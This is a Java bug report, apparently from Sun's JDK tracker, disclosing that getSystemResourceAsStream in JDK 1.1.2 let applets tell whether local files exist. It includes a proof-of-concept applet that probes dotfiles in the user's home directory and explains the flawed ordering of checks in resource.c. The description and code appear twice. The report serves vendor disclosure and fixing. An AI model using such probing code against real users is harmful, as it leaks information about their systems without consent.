Details
-
Bug
-
Resolution: Fixed
-
P1
-
1.1.2
-
1.1.4
-
sparc
-
solaris_2.5.1
-
Not verified
Description
The getSystemResourceAsStream call has a security hole in it which
allows an applet to see whether files exist or not to an applet. If a
user has "." in their CLASSPATH (which is common for developers) and
the current directory is a user's home directory (common for web
browsers launched at startup), it is quite easy.
Here's a sample program. Put "." in your CLASSPATH and cd to your
home directory. Then call this applet. It will generate a bunch of
security exceptions, but will correctly report whether the list of
files exist or not.
import java.applet.*;
import java.io.*;
public class GetResource extends Applet {
public void init() {
report(".cshrc");
report(".login");
report(".profile");
report(".exrc");
report(".emacs");
}
void report(String name) {
boolean e = exists(name);
System.err.println(name + ": " + (e ? "yes" : "no"));
}
boolean exists(String name) {
try {
InputStream i = ClassLoader.getSystemResourceAsStream(name);
return (i != null);
} catch (SecurityException ex) {
return true;
}
}
}
The problem is that getSystemResourceAsStream in resource.c checks to
see if the file exists before trying to construct a FileInputStream
(where the security check is done). Therefore, returning null means
the file doesn't exist and throwing an exception means that the file
does exist.
Alan Bishop
WebTV Networks, Inc.
###@###.###
allows an applet to see whether files exist or not to an applet. If a
user has "." in their CLASSPATH (which is common for developers) and
the current directory is a user's home directory (common for web
browsers launched at startup), it is quite easy.
Here's a sample program. Put "." in your CLASSPATH and cd to your
home directory. Then call this applet. It will generate a bunch of
security exceptions, but will correctly report whether the list of
files exist or not.
import java.applet.*;
import java.io.*;
public class GetResource extends Applet {
public void init() {
report(".cshrc");
report(".login");
report(".profile");
report(".exrc");
report(".emacs");
}
void report(String name) {
boolean e = exists(name);
System.err.println(name + ": " + (e ? "yes" : "no"));
}
boolean exists(String name) {
try {
InputStream i = ClassLoader.getSystemResourceAsStream(name);
return (i != null);
} catch (SecurityException ex) {
return true;
}
}
}
The problem is that getSystemResourceAsStream in resource.c checks to
see if the file exists before trying to construct a FileInputStream
(where the security check is done). Therefore, returning null means
the file doesn't exist and throwing an exception means that the file
does exist.
Alan Bishop
WebTV Networks, Inc.
###@###.###